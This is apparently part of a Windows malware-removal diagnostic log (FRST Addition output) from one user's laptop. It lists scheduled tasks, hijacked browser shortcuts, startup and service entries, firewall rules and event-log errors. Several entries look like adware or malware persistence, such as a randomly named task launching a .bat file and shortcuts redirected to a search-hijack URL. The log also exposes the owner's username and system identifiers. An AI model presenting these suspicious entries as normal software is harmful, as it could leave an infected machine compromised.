Task: {45990708-B34A-436F-BE29-9EA605DD416D} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {45F5242B-C2FC-4454-9CF1-BE4671B59D6C} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {481D6FE8-8CD0-499D-AA02-DF3B8164C7D1} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {4F094485-564E-4476-86A4-BCFBCC9C239A} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {55EE3DBF-57F8-4103-83B5-88720E7EEBD8} - System32\Tasks\{0E6FA772-6156-47E2-AE1D-5EE3A8A05AD9} => C:\Program Files (x86)\Skype\\Phone\Skype.exe [2013-07-25] (Skype Technologies S.A.)
Task: {5FDFFDC9-967D-4EDE-A7C3-BEE9A0C27400} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {65D5FB16-42C7-455F-9350-4764AE0293D0} - System32\Tasks\{E4FFFFE0-2787-4DAC-B105-2C808A1A2A4D} => pcalua.exe -a C:\Users\RoNiN\AppData\Local\Temp\jre-8u31-windows-au.exe -d C:\windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1
Task: {675E23A2-F0D8-4806-9687-F581BB0AC6B7} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {6A490FA7-CA93-4214-B394-9AB008143C0D} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {6B6A2BE2-8A42-4CCE-96D1-DCDE0AA16594} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {6CFB64B8-C96E-4505-B19D-05BFFFDB4366} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {7F54B173-73A7-455D-B8D3-05CDBEB04D24} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {81C671AC-4BCA-4B4C-B16A-DA9DC94B2032} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {869A0025-9207-4E47-A0E0-83ACF33323CB} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe
Task: {8FD417A1-EAB1-4416-AFED-D43B138420F6} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {974DD040-169D-46B7-B08A-60E9035DA668} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A7A740CC-1533-48ED-98D6-67AEE41F1954} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {A81D9481-C8A7-47F7-A447-0ACE98E4FAF4} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {AB264965-3447-457B-AC17-BEE07AFCF056} - System32\Tasks\Microsoft\Windows\Media Center\Extender\Update media permissions for Mcx1-RONIN-LAPTOP => C:\Windows\ehome\McxTask.exe
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
Task: {C6CF2B0F-A54A-4CCD-88C0-72501BA9267D} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {C84934AC-6228-4A08-9F09-7D7A54133B68} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C94198D0-0BC7-4528-B38A-B285C7D79AC0} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {CC2E5376-92DF-4854-8C3D-F54EED7D6667} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {CEAFA10F-5C90-45F6-BCFE-420DFC90526C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {DF294663-0E97-4583-81A3-6DA69DA846AC} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {ED1A577E-497C-4A70-998F-01B3E908FA9B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {FAAA50A7-6B6E-4A1A-B40E-B19F2672A919} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {FB119739-D5B0-4725-B8A1-6684820F96FB} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {FC5FE3D1-68A5-4CAD-84FC-0A61139E9C31} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a41ce5b91aa3166e\MightyText - SMS from PC & Text from Computer.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-07-09 23:33 - 2015-07-09 23:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00019640 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-10-31 17:47 - 2013-10-31 17:47 - 00954696 _____ () C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 02641760 _____ () C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentDeliveryManager.Background.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 02108256 _____ () C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ContentManagementSDK.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-09 04:52 - 2015-11-25 00:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 04:51 - 2015-11-25 00:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 04:52 - 2015-11-25 00:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2009-12-10 04:39 - 2008-09-19 04:03 - 00167936 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\LIBPQ.dll
2009-02-12 20:01 - 2006-11-06 19:18 - 00963584 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\libxml2.dll
2005-07-20 06:48 - 2005-07-20 07:48 - 00059904 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\zlib1.dll
2008-02-04 22:43 - 2008-02-04 23:43 - 00027136 _____ () C:\Program Files (x86)\PostgreSQL\8.3\lib\plugins\plugin_debugger.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00020792 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2016-02-10 21:59 - 2016-02-10 21:59 - 00170496 _____ () C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\IsdiInterop\c77312f309b32c7ba095241bb8fa6749\IsdiInterop.ni.dll
2010-06-18 01:06 - 2010-04-13 12:52 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-19 13:15 - 2016-03-11 19:16 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\RoNiN\Desktop\Pics\Taxi Driver Cinespia.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: 1198E835-A0AB-4C55-9629-D16AFAD406CB => 3
MSCONFIG\Services: 93530252-4B7E-48FF-9DAA-4D90DB571BBB => 3
MSCONFIG\Services: ACDaemon => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: APNMCP => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: AppxikenoZ => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BrsHelper => 2
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: CLDTVHNService => 2
MSCONFIG\Services: CloudPrinter => 2
MSCONFIG\Services: CltMngSvc => 2
MSCONFIG\Services: Dataup => 2
MSCONFIG\Services: dojygici => 2
MSCONFIG\Services: Ejuvde => 2
MSCONFIG\Services: ETDService => 2
MSCONFIG\Services: FirebirdServerMAGIXInstance => 3
MSCONFIG\Services: Gambali => 2
MSCONFIG\Services: groover110320162257 Updater => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Jhfuy => 2
MSCONFIG\Services: kBTNrls => 2
MSCONFIG\Services: McciCMService => 2
MSCONFIG\Services: McciCMService64 => 2
MSCONFIG\Services: MPCProtectService => 
MSCONFIG\Services: mwrc => 2
MSCONFIG\Services: Nijgatfy => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Service Mgr FindSearchWindow => 2
MSCONFIG\Services: shopperz130320161459 Updater => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SMUpd => 2
MSCONFIG\Services: SPBIUpd => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: Update Mgr FindSearchWindow => 2
MSCONFIG\Services: wdsvc => 2
MSCONFIG\Services: wrc => 2
MSCONFIG\Services: wucotusy => 2
MSCONFIG\Services: wugixojyzbt => 2
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\Services: zigipyro => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk => C:\windows\pss\Microsoft Office.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\RoNiN\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ArcSoft Connection Service => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
MSCONFIG\startupreg: Bing Bar => "C:\Program Files (x86)\MSN Toolbar\Platform\5.0.1423.0\mswinext.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: com.apple.dav.bookmarks.daemon => C:\Program Files (x86)\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: HP Photosmart 6510 series (NET) => "C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN1852217505QB:NW" -scfn "HP Photosmart 6510 series (NET)" -AutoStart 1
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Live Update 5 => C:\Program Files (x86)\MSI\Live Update 5\BootStartLiveupdate.exe /reminder
MSCONFIG\startupreg: Microsoft Default Manager => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: PCShowServer => "C:\Users\RoNiN\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: ShadowPlay => C:\windows\system32\rundll32.exe C:\windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SkyDrive => "C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe" /background
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Users\RoNiN\update\realsched.exe"  -osboot
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: UpdReg => C:\windows\UpdReg.EXE
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
HKLM\...\StartupApproved\StartupFolder: => "AllPCoptimizer.exe.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WebBrowserMixVideoPlayer.lnk"
HKLM\...\StartupApproved\Run: => "THXCfg64"
HKLM\...\StartupApproved\Run: => "IDSCPRODUCT"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "CitrixReceiver"
HKLM\...\StartupApproved\Run32: => "Rt45"
HKLM\...\StartupApproved\Run32: => "BSOD"
HKLM\...\StartupApproved\Run32: => "QwaT1"
HKLM\...\StartupApproved\Run32: => "QwaT4"
HKLM\...\StartupApproved\Run32: => "QwaT5"
HKLM\...\StartupApproved\Run32: => "QwaTgg"
HKLM\...\StartupApproved\Run32: => "QwaT22"
HKLM\...\StartupApproved\Run32: => "QwaT55"
HKLM\...\StartupApproved\Run32: => "QwaT21"
HKLM\...\StartupApproved\Run32: => "QwaT78"
HKLM\...\StartupApproved\Run32: => "QwaT"
HKLM\...\StartupApproved\Run32: => "Rty01"
HKLM\...\StartupApproved\Run32: => "cpx"
HKLM\...\StartupApproved\Run32: => "Rt562@"
HKLM\...\StartupApproved\Run32: => "mpck_en_005030264"
HKLM\...\StartupApproved\Run32: => "msrtn32"
HKLM\...\StartupApproved\Run32: => "ospd_us_037010264"
HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "rec_en_222"
HKLM\...\StartupApproved\Run32: => "rec_en_224"
HKLM\...\StartupApproved\Run32: => "rst"
HKLM\...\StartupApproved\Run32: => "sun13"
HKLM\...\StartupApproved\Run32: => "TV"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "Storm Alerts.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "StormAlertsApp.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "SideSync"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "wdbext"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "Windi"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{354199B7-F83D-495C-9D2C-3BA29A4920A5}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{10D8A433-FF54-408D-BD19-8ECAF71549D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{C8C0F0F4-0183-4523-BC93-2E0D15D26F01}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{21F97557-5316-4375-84A5-0B7440C1C0D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{F23838C4-65A8-4FC7-B6C2-6B70C4E93033}] => (Allow) LPort=808
FirewallRules: [{B2A68B46-9A65-4A8E-B285-1E48E4A7B975}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
FirewallRules: [{BF87AEAD-08C8-402A-835D-3474CD53CC70}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{39A33CB2-D099-4F9A-B02A-951093D131D3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1BA4519A-A342-4BB7-B7ED-08B0A6CC57F6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{DDA3509A-3FD8-4C09-87F6-F4CB0C7DA6F4}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1A44FB89-25DE-4E0A-A722-0E07C2162364}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{0113C91F-F729-4DB8-8CD4-21A2E49DD8C6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [TCP Query User{4E874D1D-1D1B-4AA1-BD8B-A789E8030874}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{A7DAE9F1-5ADA-449C-B077-BEAAEEBF82D2}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [{86453128-7424-45D8-8978-BA280CCA1BC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
 
==================== Restore Points =========================
 
09-04-2016 10:34:10 Installed TurboTax 2015 wrapper
13-04-2016 20:21:09 Restore Point Created by FRST
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/14/2016 06:46:45 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 49.0.2623.112, time stamp: 0x57045c79
Faulting module name: chrome.exe, version: 49.0.2623.112, time stamp: 0x57045c79
Exception code: 0xc0000409
Fault offset: 0x00000000000800c0
Faulting process id: 0x1a08
Faulting application start time: 0xchrome.exe0
Faulting application path: chrome.exe1
Faulting module path: chrome.exe2
Report Id: chrome.exe3
Faulting package full name: chrome.exe4
Faulting package-relative application ID: chrome.exe5
 
Error: (04/14/2016 06:41:48 PM) (Source: ESENT) (EventID: 489) (User: )
Description: SettingSyncHost (6132) An attempt to open the file "C:\Users\RoNiN\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\meta.edb" for read only access failed with system error 32 (0x00000020): "The process cannot access the file because it is being used by another process. ".  The open file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/14/2016 06:41:38 PM) (Source: ESENT) (EventID: 454) (User: )
Description: SettingSyncHost (6132) {AFFE6556-641B-404C-951F-EEC40F5CA4CD}: Database recovery/restore failed with unexpected error -1216.
 
Error: (04/14/2016 06:41:38 PM) (Source: ESENT) (EventID: 494) (User: )
Description: SettingSyncHost (6132) {AFFE6556-641B-404C-951F-EEC40F5CA4CD}: Database recovery failed with error -1216 because it encountered references to a database, 'C:\Users\RoNiN\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\meta.edb', which is no longer present. The database was not brought to a Clean Shutdown state before it was removed (or possibly moved or renamed). The database engine will not permit recovery to complete for this instance until the missing database is re-instated. If the database is truly no longer available and no longer required, procedures for recovering from this error are available in the Microsoft Knowledge Base or by following the "more information" link at the bottom of this message.
 
Error: (04/14/2016 06:41:38 PM) (Source: ESENT) (EventID: 490) (User: )
Description: SettingSyncHost (6132) {AFFE6556-641B-404C-951F-EEC40F5CA4CD}: An attempt to open the file "C:\Users\RoNiN\AppData\Local\Microsoft\Windows\SettingSync\remotemetastore\v1\meta.edb" for read / write access failed with system error 32 (0x00000020): "The process cannot access the file because it is being used by another process. ".  The open file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/14/2016 06:41:03 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (6132) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/14/2016 06:41:03 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (6132) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/14/2016 06:40:52 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (6132) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/14/2016 06:40:52 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (6132) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/14/2016 06:40:42 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (6132) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
 
System errors:
=============
Error: (04/14/2016 06:39:02 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Group Policy Client service, but this action failed with the following error: 
%%1056
 
Error: (04/14/2016 06:38:10 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (04/14/2016 06:37:02 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Group Policy Client service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 120000 milliseconds: Restart the service.
 
Error: (04/14/2016 06:37:02 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The HomeGroup Provider service depends on the Function Discovery Resource Publication service which failed to start because of the following error: 
%%1070
 
Error: (04/14/2016 06:37:02 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Function Discovery Resource Publication service hung on starting.
 
Error: (04/14/2016 06:34:31 PM) (Source: volmgr) (EventID: 46) (User: )
Description: Crash dump initialization failed!
 
Error: (04/14/2016 06:34:23 PM) (Source: sptd) (EventID: 4) (User: )
Description: Driver detected an internal error in its data structures for .
 
Error: (04/14/2016 06:34:56 PM) (Source: EventLog) (EventID: 6008) (User: )
